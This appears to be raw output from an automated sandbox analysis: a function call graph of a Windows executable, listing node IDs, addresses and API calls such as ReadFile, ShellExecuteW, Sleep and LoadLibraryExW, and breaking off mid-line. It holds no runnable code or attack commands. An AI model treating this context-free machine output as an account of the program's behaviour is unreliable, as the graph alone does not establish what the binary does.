94224->94225 94226 e442d9 94224->94226 94225->94226 94227 e835ba LoadResource 94225->94227 94226->94160 94227->94226 94228 e835cf SizeofResource 94227->94228 94228->94226 94229 e835e3 LockResource 94228->94229 94229->94226 94231 e83d90 94230->94231 94232 e4512e 94230->94232 94236 e6ece3 94232->94236 94235->94153 94239 e6eaaa 94236->94239 94238 e4513c 94238->94160 94242 e6eab6 __FrameHandler3::FrameUnwindToState 94239->94242 94240 e6eac2 94252 e6f2d9 20 API calls _free 94240->94252 94242->94240 94243 e6eae8 94242->94243 94254 e6918d EnterCriticalSection 94243->94254 94244 e6eac7 94253 e727ec 26 API calls __cftof 94244->94253 94247 e6eaf4 94255 e6ec0a 62 API calls 2 library calls 94247->94255 94249 e6eb08 94256 e6eb27 LeaveCriticalSection __fread_nolock 94249->94256 94251 e6ead2 __fread_nolock 94251->94238 94252->94244 94253->94251 94254->94247 94255->94249 94256->94251 94260 e6e8e1 94257->94260 94259 e45118 94259->94166 94261 e6e8ed __FrameHandler3::FrameUnwindToState 94260->94261 94262 e6e900 ___scrt_fastfail 94261->94262 94263 e6e92d 94261->94263 94264 e6e925 __fread_nolock 94261->94264 94287 e6f2d9 20 API calls _free 94262->94287 94273 e6918d EnterCriticalSection 94263->94273 94264->94259 94267 e6e937 94274 e6e6f8 94267->94274 94268 e6e91a 94288 e727ec 26 API calls __cftof 94268->94288 94273->94267 94275 e6e727 94274->94275 94278 e6e70a ___scrt_fastfail 94274->94278 94289 e6e96c LeaveCriticalSection __fread_nolock 94275->94289 94276 e6e717 94362 e6f2d9 20 API calls _free 94276->94362 94278->94275 94278->94276 94282 e6e76a __fread_nolock 94278->94282 94279 e6e71c 94363 e727ec 26 API calls __cftof 94279->94363 94281 e6e886 ___scrt_fastfail 94365 e6f2d9 20 API calls _free 94281->94365 94282->94275 94282->94281 94290 e6d955 94282->94290 94297 e78d45 94282->94297 94364 e6cf78 26 API calls 4 library calls 94282->94364 94287->94268 94288->94264 94289->94264 94291 e6d976 94290->94291 94292 e6d961 94290->94292 94291->94282 94366 e6f2d9 20 API calls _free 94292->94366 94294 e6d966 94367 e727ec 26 API calls __cftof 94294->94367 94296 e6d971 94296->94282 94298 e78d57 94297->94298 94299 e78d6f 94297->94299 94377 e6f2c6 20 API calls _free 94298->94377 94301 e790d9 94299->94301 94306 e78db4 94299->94306 94399 e6f2c6 20 API calls _free 94301->94399 94302 e78d5c 94378 e6f2d9 20 API calls _free 94302->94378 94305 e790de 94400 e6f2d9 20 API calls _free 94305->94400 94307 e78d64 94306->94307 94309 e78dbf 94306->94309 94313 e78def 94306->94313 94307->94282 94379 e6f2c6 20 API calls _free 94309->94379 94310 e78dcc 94401 e727ec 26 API calls __cftof 94310->94401 94312 e78dc4 94380 e6f2d9 20 API calls _free 94312->94380 94316 e78e08 94313->94316 94317 e78e2e 94313->94317 94318 e78e4a 94313->94318 94316->94317 94353 e78e15 94316->94353 94381 e6f2c6 20 API calls _free 94317->94381 94384 e73820 94318->94384 94321 e78e33 94382 e6f2d9 20 API calls _free 94321->94382 94325 e729c8 _free 20 API calls 94328 e78e6a 94325->94328 94326 e78e3a 94383 e727ec 26 API calls __cftof 94326->94383 94327 e78fb3 94330 e79029 94327->94330 94333 e78fcc GetConsoleMode 94327->94333 94331 e729c8 _free 20 API calls 94328->94331 94332 e7902d ReadFile 94330->94332 94334 e78e71 94331->94334 94335 e79047 94332->94335 94336 e790a1 GetLastError 94332->94336 94333->94330 94337 e78fdd 94333->94337 94338 e78e96 94334->94338 94339 e78e7b 94334->94339 94335->94336 94348 e7901e 94335->94348 94340 e79005 94336->94340 94341 e790ae 94336->94341 94337->94332 94342 e78fe3 ReadConsoleW 94337->94342 94393 e79424 28 API calls __fread_nolock 94338->94393 94391 e6f2d9 20 API calls _free 94339->94391 94343 e78e45 __fread_nolock 94340->94343 94394 e6f2a3 20 API calls 2 library calls 94340->94394 94397 e6f2d9 20 API calls _free 94341->94397 94342->94348 94349 e78fff GetLastError 94342->94349 94344 e729c8 _free 20 API calls 94343->94344 94344->94307 94348->94343 94356 e79083 94348->94356 94357 e7906c 94348->94357 94349->94340 94368 e7f89b 94353->94368 94356->94343 94362->94279 94363->94275 94364->94282 94365->94279 94366->94294 94367->94296 94369 e7f8b5 94368->94369 94370 e7f8a8 94368->94370 94373 e7f8c1 94369->94373 94403 e6f2d9 20 API calls _free 94369->94403 94402 e6f2d9 20 API calls _free 94370->94402 94372 e7f8ad 94372->94327 94373->94327 94375 e7f8e2 94404 e727ec 26 API calls __cftof 94375->94404 94377->94302 94378->94307 94379->94312 94380->94310 94381->94321 94382->94326 94383->94343 94385 e7385e 94384->94385 94389 e7382e _free 94384->94389 94406 e6f2d9 20 API calls _free 94385->94406 94387 e73849 RtlAllocateHeap 94388 e7385c 94387->94388 94387->94389 94388->94325 94389->94385 94389->94387 94405 e64ead 7 API calls 2 library calls 94389->94405 94393->94353 94394->94343 94399->94305 94400->94310 94401->94307 94402->94372 94403->94375 94404->94372 94405->94389 94406->94388 94410 e6e4e8 94407->94410 94409 eb275d 94409->94168 94413 e6e469 94410->94413 94412 e6e505 94412->94409 94414 e6e478 94413->94414 94416 e6e48c 94413->94416 94428 e6f2d9 20 API calls _free 94414->94428 94420 e6e488 __alldvrm 94416->94420 94421 e7333f 94416->94421 94417 e6e47d 94429 e727ec 26 API calls __cftof 94417->94429 94420->94412 94430 e72fd7 94421->94430 94424 e7337e GetSystemTimeAsFileTime 94425 e73372 94424->94425 94437 e60a8c 94425->94437 94427 e7338f 94427->94420 94428->94417 94429->94420 94431 e73007 94430->94431 94435 e73003 94430->94435 94431->94424 94431->94425 94432 e73027 94432->94431 94434 e73033 GetProcAddress 94432->94434 94436 e73043 __crt_fast_encode_pointer 94434->94436 94435->94431 94435->94432 94444 e73073 94435->94444 94436->94431 94438 e60a97 IsProcessorFeaturePresent 94437->94438 94439 e60a95 94437->94439 94441 e60c5d 94438->94441 94439->94427 94451 e60c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 94441->94451 94443 e60d40 94443->94427 94445 e73094 LoadLibraryExW 94444->94445 94446 e73089 94444->94446 94447 e730b1 GetLastError 94445->94447 94450 e730c9 94445->94450 94446->94435 94448 e730bc LoadLibraryExW 94447->94448 94447->94450 94448->94450 94449 e730e0 FreeLibrary 94449->94446 94450->94446 94450->94449 94451->94443 94456 eb2e7a 94452->94456 94453 e450f5 40 API calls 94453->94456 94454 eb2d3b 94454->94097 94454->94115 94455 eb28fe 27 API calls 94455->94456 94456->94453 94456->94454 94456->94455 94457 e4511f 64 API calls 94456->94457 94457->94456 94763 e41cad SystemParametersInfoW 94764 e82ba5 94765 e42b25 94764->94765 94766 e82baf 94764->94766 94792 e42b83 7 API calls 94765->94792 94798 e43a5a 94766->94798 94770 e82bb8 94805 e49cb3 94770->94805 94773 e42b2f 94775 e42b44 94773->94775 94796 e43837 49 API calls ___scrt_fastfail 94773->94796 94774 e82bc6 94776 e82bce 94774->94776 94777 e82bf5 94774->94777 94783 e42b5f 94775->94783 94797 e430f2 Shell_NotifyIconW ___scrt_fastfail 94775->94797 94811 e433c6 94776->94811 94778 e433c6 22 API calls 94777->94778 94791 e82bf1 GetForegroundWindow ShellExecuteW 94778->94791 94788 e42b66 SetCurrentDirectoryW 94783->94788 94785 e82c26 94785->94783 94790 e42b7a 94788->94790 94789 e433c6 22 API calls 94789->94791 94791->94785 94829 e42cd4 7 API calls 94792->94829 94794 e42b2a 94795 e42c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94794->94795 94795->94773 94796->94775 94797->94783 94799 e81f50 __wsopen_s 94798->94799 94800 e43a67 GetModuleFileNameW 94799->94800 94801 e49cb3 22 API calls 94800->94801 94802 e43a8d 94801->94802 94803 e43aa2 23 API calls 94802->94803 94804 e43a97 94803->94804 94804->94770 94806 e49cc2 _wcslen 94805->94806 94807 e5fe0b 22 API calls 94806->94807 94808 e49cea __fread_nolock 94807->94808 94809 e5fddb 22 API calls 94808->94809 94810 e49d00 94809->94810 94810->94774 94812 e830bb 94811->94812 94813 e433dd 94811->94813 94815 e5fddb 22 API calls 94812->94815 94830 e433ee 94813->94830 94817 e830c5 _wcslen 94815->94817 94816 e433e8 94820 e46350 94816->94820 94818 e5fe0b 22 API calls 94817->94818 94819 e830fe __fread_nolock 94818->94819 94821 e46362 94820->94821 94822 e84a51 94820->94822 94845 e46373 94821->94845 94855 e44a88 22 API calls __fread_nolock 94822->94855 94825 e84a5b 94827 e84a67 94825->94827 94828 e4a8c7 22 API calls 94825->94828 94826 e4636e 94826->94789 94828->94827 94829->94794 94831 e433fe _wcslen 94830->94831 94832 e8311d 94831->94832 94833 e43411 94831->94833 94835 e5fddb 22 API calls 94832->94835 94840 e4a587 94833->94840 94836 e83127 94835->94836 94838 e5fe0b 22 API calls 94836->94838 94837 e4341e __fread_nolock 94837->94816 94839 e83157 __fread_nolock 94838->94839 94841 e4a59d 94840->94841 94844 e4a598 __fread_nolock 94840->94844 94842 e8f80f 94841->94842 94843 e5fe0b 22 API calls 94841->94843 94843->94844 94844->94837 94847 e46382 94845->94847 94851 e463b6 __fread_nolock 94845->94851 94846 e84a82 94850 e5fddb 22 API calls 94846->94850 94847->94846 94848 e463a9 94847->94848 94847->94851 94849 e4a587 22 API calls 94848->94849 94849->94851 94852 e84a91 94850->94852 94851->94826 94853 e5fe0b 22 API calls 94852->94853 94854 e84ac5 __fread_nolock 94853->94854 94855->94825 94856 e603e9 94861 e609d5 SetUnhandledExceptionFilter 94856->94861 94858 e603ee pre_c_initialization 94862 e64fa9 26 API calls 2 library calls 94858->94862 94860 e603f9 94861->94858 94862->94860 94863 e925fb 95063 eabe52 94863->95063 94866 e92605 94871 e92630 94866->94871 94872 eabe52 Sleep 94866->94872 94900 e4d815 ISource 94866->94900 95073 e5e300 23 API calls 94866->95073 94867 e4dbaf Sleep 94868 e4dbc0 94867->94868 94879 e4dbcb 94867->94879 95070 e5e551 timeGetTime 94868->95070 94869 e92b74 Sleep 94873 e92b90 94869->94873 94874 e92b85 94869->94874 94876 e49cb3 22 API calls 94871->94876 94872->94866 94875 e92bdb 94873->94875 94905 e4d9b8 ISource 94873->94905 95082 ead4dc 47 API calls 94873->95082 95081 e5e551 timeGetTime 94874->95081 94883 e92c0b GetExitCodeProcess 94875->94883 94890 e92c51 94875->94890 94875->94905 94880 e92660 94876->94880 94881 e92a5a 94879->94881 94882 e92a51 94879->94882 94891 e4dc56 94879->94891 94894 e92a58 94879->94894 94879->94905 95074 e4a993 41 API calls 94880->95074 95078 ed29bf GetForegroundWindow 94881->95078 95077 ed29bf GetForegroundWindow 94882->95077 94886 e92c21 WaitForSingleObject 94883->94886 94887 e92c37 CloseHandle 94883->94887 94886->94887 94886->94905 94887->94890 94889 e9267c 95075 eb3a2a 23 API calls 94889->95075 94893 e92ca9 Sleep 94890->94893 94891->94905 94893->94905 94894->94891 94895 e92b47 94894->94895 94894->94905 95079 ec5658 23 API calls 94894->95079 95080 eae97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94895->95080 94899 e928ce 94902 e4ec40 256 API calls 94899->94902 94900->94867 94900->94869 94900->94899 94900->94905 94906 e4dac8 94900->94906 94908 e4db11 PeekMessageW 94900->94908 94909 e91cbe TranslateAcceleratorW 94900->94909 94910 e4db8f PeekMessageW 94900->94910 94912 e4db73 TranslateMessage DispatchMessageW 94900->94912 94913 e4da04 timeGetTime 94900->94913 94914 e91dda timeGetTime 94900->94914 94917 e4dd50 94900->94917 94924 e4dfd0 94900->94924 94947 e51310 94900->94947 95005 e4bf40 94900->95005 95069 e5edf6 IsDialogMessageW GetClassLongW 94900->95069 95072 eb3a2a 23 API calls 94900->95072 94902->94906 95076 eb359c 82 API calls __wsopen_s 94906->95076 94908->94900 94909->94900 94910->94900 94912->94910 94913->94900 95071 e5e300 23 API calls 94914->95071 94918 e4dd6f 94917->94918 94920 e4dd83 94917->94920 95083 e4d260 256 API calls 2 library calls 94918->95083 95084 eb359c 82 API calls __wsopen_s 94920->95084 94921 e4dd7a 94921->94900 94923 e92f75 94923->94923 94925 e4e010 94924->94925 94944 e4e0dc ISource 94925->94944 95087 e60242 5 API calls __Init_thread_wait 94925->95087 94928 eb359c 82 API calls 94928->94944 94929 e92fca 94932 e4a961 22 API calls 94929->94932 94929->94944 94930 e4e3e1 94930->94900 94931 e4a961 22 API calls 94931->94944 94935 e92fe4 94932->94935 95088 e600a3 29 API calls __onexit 94935->95088 94938 e92fee 95089 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94938->95089 94940 e4ec40 256 API calls 94940->94944 94942 e4a8c7 22 API calls 94942->94944 94943 e504f0 22 API calls 94943->94944 94944->94928 94944->94930 94944->94931 94944->94940 94944->94942 94944->94943 95085 e4a81b 41 API calls 94944->95085 95086 e5a308 256 API calls 94944->95086 95090 e60242 5 API calls __Init_thread_wait 94944->95090 95091 e600a3 29 API calls __onexit 94944->95091 95092 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94944->95092 95093 ec47d4 256 API calls 94944->95093 95094 ec68c1 256 API calls 94944->95094 94948 e51376 94947->94948 94949 e517b0 94947->94949 94950 e51390 94948->94950 94951 e96331 94948->94951 95308 e60242 5 API calls __Init_thread_wait 94949->95308 94953 e51940 9 API calls 94950->94953 95313 ec709c 256 API calls 94951->95313 94956 e513a0 94953->94956 94955 e517ba 94957 e517fb 94955->94957 94959 e49cb3 22 API calls 94955->94959 94958 e51940 9 API calls 94956->94958 94962 e5182c 94957->94962 94963 e9633d 94957->94963 94960 e513b6 94958->94960 94966 e517d4 94959->94966 94960->94957 94961 e513ec 94960->94961 94961->94963 94986 e51408 __fread_nolock 94961->94986 95310 e4aceb 23 API calls ISource 94962->95310 95314 eb359c 82 API calls __wsopen_s 94963->95314 95309 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94966->95309 94967 e51839 95311 e5d217 256 API calls 94967->95311 94970 e9636e 95315 eb359c 82 API calls __wsopen_s 94970->95315 94971 e5152f 94973 e963d1 94971->94973 94974 e5153c 94971->94974 95317 ec5745 54 API calls _wcslen 94973->95317 94976 e51940 9 API calls 94974->94976 94977 e51549 94976->94977 94981 e964fa 94977->94981 94983 e51940 9 API calls 94977->94983 94978 e5fddb 22 API calls 94978->94986 94979 e51872 95312 e5faeb 23 API calls 94979->95312 94980 e5fe0b 22 API calls 94980->94986 94990 e96369 94981->94990 95318 eb359c 82 API calls __wsopen_s 94981->95318 94988 e51563 94983->94988 94985 e4ec40 256 API calls 94985->94986 94986->94967 94986->94970 94986->94971 94986->94978 94986->94980 94986->94985 94987 e963b2 94986->94987 94986->94990 95316 eb359c 82 API calls __wsopen_s 94987->95316 94988->94981 94991 e4a8c7 22 API calls 94988->94991 94994 e515c7 ISource 94988->94994 94990->94900 94991->94994 94992 e51940 9 API calls 94992->94994 94993 e5171d 94993->94900 94994->94979 94994->94981 94994->94990 94994->94992 94996 e5167b ISource 94994->94996 95003 e44f39 68 API calls 94994->95003 95095 ebf0ec 94994->95095 95104 eb6ef1 94994->95104 95184 e5effa 94994->95184 95241 eb744a 94994->95241 95298 ead4ce 94994->95298 95301 ec959f 94994->95301 95304 ec958b 94994->95304 94996->94993 95307 e5ce17 22 API calls ISource 94996->95307 95003->94994 95786 e4adf0 95005->95786 95007 e4bf9d 95008 e4bfa9 95007->95008 95009 e904b6 95007->95009 95011 e904c6 95008->95011 95012 e4c01e 95008->95012 95805 eb359c 82 API calls __wsopen_s 95009->95805 95806 eb359c 82 API calls __wsopen_s 95011->95806 95791 e4ac91 95012->95791 95015 e904f5 95018 e9055a 95015->95018 95807 e5d217 256 API calls 95015->95807 95016 ea7120 22 API calls 95059 e4c039 ISource __fread_nolock 95016->95059 95017 e4c7da 95022 e5fe0b 22 API calls 95017->95022 95048 e4c603 95018->95048 95808 eb359c 82 API calls __wsopen_s 95018->95808 95026 e4c808 __fread_nolock 95022->95026 95030 e5fe0b 22 API calls 95026->95030 95027 e4ec40 256 API calls 95027->95059 95028 e4af8a 22 API calls 95028->95059 95029 e9091a 95818 eb3209 23 API calls 95029->95818 95060 e4c350 ISource __fread_nolock 95030->95060 95033 e908a5 95034 e4ec40 256 API calls 95033->95034 95036 e908cf 95034->95036 95036->95048 95816 e4a81b 41 API calls 95036->95816 95037 e90591 95809 eb359c 82 API calls __wsopen_s 95037->95809 95040 e908f6 95817 eb359c 82 API calls __wsopen_s 95040->95817 95042 e4bbe0 40 API calls 95042->95059 95044 e4c237 95046 e4c253 95044->95046 95047 e4a8c7 22 API calls 95044->95047 95050 e90976 95046->95050 95053 e4c297 ISource 95046->95053 95047->95046 95048->94900 95049 e5fddb 22 API calls 95049->95059 95819 e4aceb 23 API calls ISource 95050->95819 95055 e909bf 95053->95055 95802 e4aceb 23 API calls ISource 95053->95802 95055->95048 95820 eb359c 82 API calls __wsopen_s 95055->95820 95056 e4c335 95056->95055 95057 e4c342 95056->95057 95803 e4a704 22 API calls ISource 95057->95803 95059->95015 95059->95016 95059->95017 95059->95018 95059->95026 95059->95027 95059->95028 95059->95029 95059->95033 95059->95037 95059->95040 95059->95042 95059->95044 95059->95048 95059->95049 95059->95055 95061 e5fe0b 22 API calls 95059->95061 95795 e4ad81 95059->95795 95810 ea7099 22 API calls __fread_nolock 95059->95810 95811 ec5745 54 API calls _wcslen 95059->95811 95812 e5aa42 22 API calls ISource 95059->95812 95813 eaf05c 40 API calls 95059->95813 95814 e4a993 41 API calls 95059->95814 95815 e4aceb 23 API calls ISource 95059->95815 95062 e4c3ac 95060->95062 95804 e5ce17 22 API calls ISource 95060->95804 95061->95059 95062->94900 95064 eabe78 95063->95064 95065 eabe5d 95063->95065 95066 eabea6 95064->95066 95067 eabe94 Sleep 95064->95067 95065->94866 95066->94866 95067->95066 95069->94900 95070->94879 95071->94900 95072->94900 95073->94866 95074->94889 95075->94905 95076->94905 95077->94894 95078->94894 95079->94895 95080->94891 95081->94873 95082->94875 95083->94921 95084->94923 95085->94944 95086->94944 95087->94929 95088->94938 95089->94944 95090->94944 95091->94944 95092->94944 95093->94944 95094->94944 95319 e47510 95095->95319 95099 ebf136 95100 ebf15b 95099->95100 95101 e4ec40 256 API calls 95099->95101 95103 ebf15f 95100->95103 95370 e49c6e 95100->95370 95101->95100 95103->94994 95105 e4a961 22 API calls 95104->95105 95106 eb6f1d 95105->95106 95107 e4a961 22 API calls 95106->95107 95108 eb6f26 95107->95108 95109 eb6f3a 95108->95109 95556 e4b567 95108->95556 95111 e47510 53 API calls 95109->95111 95116 eb6f57 _wcslen 95111->95116 95112 eb70bf 95115 e44ecb 94 API calls 95112->95115 95113 eb6fbc 95114 e47510 53 API calls 95113->95114 95117 eb6fc8 95114->95117 95118 eb70d0 95115->95118 95116->95112 95116->95113 95124 eb70e9 95116->95124 95122 e4a8c7 22 API calls 95117->95122 95126 eb6fdb 95117->95126 95119 eb70e5 95118->95119 95120 e44ecb 94 API calls 95118->95120 95121 e4a961 22 API calls 95119->95121 95119->95124 95120->95119 95123 eb711a 95121->95123 95122->95126 95125 e4a961 22 API calls 95123->95125 95124->94994 95129 eb7126 95125->95129 95127 eb7027 95126->95127 95130 eb7005 95126->95130 95131 e4a8c7 22 API calls 95126->95131 95128 e47510 53 API calls 95127->95128 95133 eb7034 95128->95133 95134 e4a961 22 API calls 95129->95134 95132 e433c6 22 API calls 95130->95132 95131->95130 95135 eb700f 95132->95135 95136 eb703d 95133->95136 95137 eb7047 95133->95137 95138 eb712f 95134->95138 95139 e47510 53 API calls 95135->95139 95140 e4a8c7 22 API calls 95136->95140 95561 eae199 GetFileAttributesW 95137->95561 95142 e4a961 22 API calls 95138->95142 95143 eb701b 95139->95143 95140->95137 95145 eb7138 95142->95145 95147 e46350 22 API calls 95143->95147 95144 eb7050 95148 eb7063 95144->95148 95149 e44c6d 22 API calls 95144->95149 95146 e47510 53 API calls 95145->95146 95150 eb7145 95146->95150 95147->95127 95151 e47510 53 API calls 95148->95151 95157 eb7069 95148->95157 95149->95148 95402 e4525f 95150->95402 95153 eb70a0 95151->95153 95562 ead076 57 API calls 95153->95562 95154 eb7166 95444 e44c6d 95154->95444 95157->95124 95159 eb71a9 95161 e4a8c7 22 API calls 95159->95161 95160 e44c6d 22 API calls 95162 eb7186 95160->95162 95163 eb71ba 95161->95163 95162->95159 95166 e46b57 22 API calls 95162->95166 95164 e46350 22 API calls 95163->95164 95165 eb71c8 95164->95165 95167 e46350 22 API calls 95165->95167 95168 eb719b 95166->95168 95169 eb71d6 95167->95169 95170 e46b57 22 API calls 95168->95170 95171 e46350 22 API calls 95169->95171 95170->95159 95172 eb71e4 95171->95172 95185 e49c6e 22 API calls 95184->95185 95186 e5f012 95185->95186 95188 e5fddb 22 API calls 95186->95188 95191 e9f0a8 95186->95191 95189 e5f02b 95188->95189 95190 e5fe0b 22 API calls 95189->95190 95192 e5f03c 95190->95192 95231 e5f0a4 95191->95231 95638 eb9caa 39 API calls 95191->95638 95606 e46246 95192->95606 95195 e4b567 39 API calls 95197 e9f10a 95195->95197 95196 e4a961 22 API calls 95198 e5f04f 95196->95198 95199 e5f0b1 95197->95199 95200 e9f112 95197->95200 95201 e46246 CloseHandle 95198->95201 95587 e5fa5b 95199->95587 95203 e4b567 39 API calls 95200->95203 95204 e5f056 95201->95204 95208 e5f0b8 95203->95208 95205 e47510 53 API calls 95204->95205 95206 e5f062 95205->95206 95207 e46246 CloseHandle 95206->95207 95209 e5f06c 95207->95209 95210 e5f0d3 95208->95210 95211 e9f127 95208->95211 95610 e45745 95209->95610 95213 e46270 22 API calls 95210->95213 95214 e5fe0b 22 API calls 95211->95214 95216 e5f0db 95213->95216 95217 e9f12c 95214->95217 95592 e5f141 95216->95592 95218 e9f140 95217->95218 95639 e5f866 ReadFile SetFilePointerEx 95217->95639 95230 e9f144 __fread_nolock 95218->95230 95640 eb0e85 22 API calls ___scrt_fastfail 95218->95640 95219 e5f085 95618 e453de 95219->95618 95220 e9f0a0 95637 e46216 CloseHandle ISource 95220->95637 95222 e5f0ea 95222->95230 95634 e462b5 22 API calls 95222->95634 95228 e5f093 95633 e453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95228->95633 95231->95195 95231->95199 95232 e5f0fe 95235 e5f138 95232->95235 95236 e46246 CloseHandle 95232->95236 95233 e9f069 95636 eaccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95233->95636 95234 e5f09a 95234->95231 95234->95233 95235->94994 95238 e5f12c 95236->95238 95238->95235 95635 e46216 CloseHandle ISource 95238->95635 95239 e9f080 95239->95231 95242 eb7474 95241->95242 95243 eb7469 95241->95243 95247 e4a961 22 API calls 95242->95247 95284 eb7554 95242->95284 95244 e4b567 39 API calls 95243->95244 95244->95242 95245 e5fddb 22 API calls 95246 eb7587 95245->95246 95248 e5fe0b 22 API calls 95246->95248 95249 eb7495 95247->95249 95250 eb7598 95248->95250 95251 e4a961 22 API calls 95249->95251 95253 e46246 CloseHandle 95250->95253 95252 eb749e 95251->95252 95254 e47510 53 API calls 95252->95254 95255 eb75a3 95253->95255 95256 eb74aa 95254->95256 95257 e4a961 22 API calls 95255->95257 95258 e4525f 22 API calls 95256->95258 95259 eb75ab 95257->95259 95260 eb74bf 95258->95260 95261 e46246 CloseHandle 95259->95261 95262 e46350 22 API calls 95260->95262 95263 eb75b2 95261->95263 95264 eb74f2 95262->95264 95265 e47510 53 API calls 95263->95265 95267 eb754a 95264->95267 95268 ead4ce 4 API calls 95264->95268 95266 eb75be 95265->95266 95269 e46246 CloseHandle 95266->95269 95270 e4b567 39 API calls 95267->95270 95271 eb7502 95268->95271 95272 eb75c8 95269->95272 95270->95284 95271->95267 95273 eb7506 95271->95273 95274 e45745 5 API calls 95272->95274 95275 e49cb3 22 API calls 95273->95275 95276 eb75e2 95274->95276 95277 eb7513 95275->95277 95278 eb75ea 95276->95278 95279 eb76de GetLastError 95276->95279 95684 ead2c1 26 API calls 95277->95684 95282 e453de 27 API calls 95278->95282 95281 eb76f7 95279->95281 95688 e46216 CloseHandle ISource 95281->95688 95286 eb75f8 95282->95286 95284->95245 95296 eb76a4 95284->95296 95285 eb751c 95285->95267 95685 e453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95286->95685 95288 eb7645 95289 e5fddb 22 API calls 95288->95289 95292 eb7679 95289->95292 95290 eb7619 95686 eaccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95290->95686 95291 eb75ff 95291->95288 95291->95290 95294 e4a961 22 API calls 95292->95294 95295 eb7686 95294->95295 95295->95296 95687 ea417d 22 API calls __fread_nolock 95295->95687 95296->94994 95689 eadbbe lstrlenW 95298->95689 95694 ec7f59 95301->95694 95303 ec95af 95303->94994 95305 ec7f59 120 API calls 95304->95305 95306 ec959b 95305->95306 95306->94994 95307->94996 95308->94955 95309->94957 95310->94967 95311->94979 95312->94979 95313->94963 95314->94990 95315->94990 95316->94990 95317->94988 95318->94990 95320 e47525 95319->95320 95321 e47522 95319->95321 95322 e4752d 95320->95322 95323 e4755b 95320->95323 95342 e49e90 95321->95342 95384 e651c6 26 API calls 95322->95384 95324 e850f6 95323->95324 95327 e4756d 95323->95327 95334 e8500f 95323->95334 95387 e65183 26 API calls 95324->95387 95385 e5fb21 51 API calls 95327->95385 95328 e4753d 95331 e5fddb 22 API calls 95328->95331 95329 e8510e 95329->95329 95333 e47547 95331->95333 95335 e49cb3 22 API calls 95333->95335 95336 e5fe0b 22 API calls 95334->95336 95337 e85088 95334->95337 95335->95321 95338 e85058 95336->95338 95386 e5fb21 51 API calls 95337->95386 95339 e5fddb 22 API calls 95338->95339 95340 e8507f 95339->95340 95341 e49cb3 22 API calls 95340->95341 95341->95337 95388 e46270 95342->95388 95344 e49fd2 95394 e4a4a1 22 API calls __fread_nolock 95344->95394 95348 e8f7c4 95399 ea96e2 84 API calls __wsopen_s 95348->95399 95349 e8f699 95356 e5fddb 22 API calls 95349->95356 95350 e4a405 95352 e49fec 95350->95352 95401 ea96e2 84 API calls __wsopen_s 95350->95401 95352->95099 95354 e4a6c3 22 API calls 95368 e49eb5 95354->95368 95358 e8f754 95356->95358 95357 e8f7d2 95400 e4a4a1 22 API calls __fread_nolock 95357->95400 95361 e5fe0b 22 API calls 95358->95361 95360 e8f7e8 95360->95352 95362 e4a12c __fread_nolock 95361->95362 95362->95348 95362->95350 95364 e4a587 22 API calls 95364->95368 95365 e4aec9 22 API calls 95366 e4a0db CharUpperBuffW 95365->95366 95395 e4a673 22 API calls 95366->95395 95368->95344 95368->95348 95368->95349 95368->95350 95368->95354 95368->95362 95368->95364 95368->95365 95369 e4a4a1 22 API calls 95368->95369 95393 e44573 41 API calls _wcslen 95368->95393 95396 e448c8 23 API calls 95368->95396 95397 e449bd 22 API calls __fread_nolock 95368->95397 95398 e4a673 22 API calls 95368->95398 95369->95368 95371 e49c7e 95370->95371 95372 e8f545 95370->95372 95377 e5fddb 22 API calls 95371->95377 95373 e8f556 95372->95373 95375 e46b57 22 API calls 95372->95375 95374 e4a6c3 22 API calls 95373->95374 95376 e8f560 95374->95376 95375->95373 95376->95376 95378 e49c91 95377->95378 95379 e49cac 95378->95379 95380 e49c9a 95378->95380 95382 e4a961 22 API calls 95379->95382 95381 e49cb3 22 API calls 95380->95381 95383 e49ca2 95381->95383 95382->95383 95383->95103 95384->95328 95385->95328 95386->95324 95387->95329 95389 e5fe0b 22 API calls 95388->95389 95390 e46295 95389->95390 95391 e5fddb 22 API calls 95390->95391 95392 e462a3 95391->95392 95392->95368 95393->95368 95394->95352 95395->95368 95396->95368 95397->95368 95398->95368 95399->95357 95400->95360 95401->95352 95403 e4a961 22 API calls 95402->95403 95404 e45275 95403->95404 95405 e4a961 22 API calls 95404->95405 95406 e4527d 95405->95406 95407 e4a961 22 API calls 95406->95407 95408 e45285 95407->95408 95409 e4a961 22 API calls 95408->95409 95410 e4528d 95409->95410 95411 e452c1 95410->95411 95412 e83df5 95410->95412 95413 e46d25 22 API calls 95411->95413 95414 e4a8c7 22 API calls 95412->95414 95415 e452cf 95413->95415 95416 e83dfe 95414->95416 95417 e493b2 22 API calls 95415->95417 95418 e4a6c3 22 API calls 95416->95418 95419 e452d9 95417->95419 95420 e45304 95418->95420 95419->95420 95421 e46d25 22 API calls 95419->95421 95422 e45349 95420->95422 95423 e45325 95420->95423 95440 e83e20 95420->95440 95425 e452fa 95421->95425 95563 e46d25 95422->95563 95423->95422 95428 e44c6d 22 API calls 95423->95428 95427 e493b2 22 API calls 95425->95427 95426 e4535a 95429 e45370 95426->95429 95434 e4a8c7 22 API calls 95426->95434 95427->95420 95430 e45332 95428->95430 95432 e45384 95429->95432 95436 e4a8c7 22 API calls 95429->95436 95430->95422 95435 e46d25 22 API calls 95430->95435 95431 e46b57 22 API calls 95441 e83ee0 95431->95441 95433 e4538f 95432->95433 95437 e4a8c7 22 API calls 95432->95437 95438 e4a8c7 22 API calls 95433->95438 95442 e4539a 95433->95442 95434->95429 95435->95422 95436->95432 95437->95433 95438->95442 95439 e44c6d 22 API calls 95439->95441 95440->95431 95441->95422 95441->95439 95576 e449bd 22 API calls __fread_nolock 95441->95576 95442->95154 95445 e4aec9 22 API calls 95444->95445 95446 e44c78 95445->95446 95446->95159 95446->95160 95557 e4b578 95556->95557 95558 e4b57f 95556->95558 95557->95558 95586 e662d1 39 API calls _strftime 95557->95586 95558->95109 95560 e4b5c2 95560->95109 95561->95144 95562->95157 95564 e46d34 95563->95564 95565 e46d91 95563->95565 95564->95565 95567 e46d3f 95564->95567 95566 e493b2 22 API calls 95565->95566 95568 e46d62 __fread_nolock 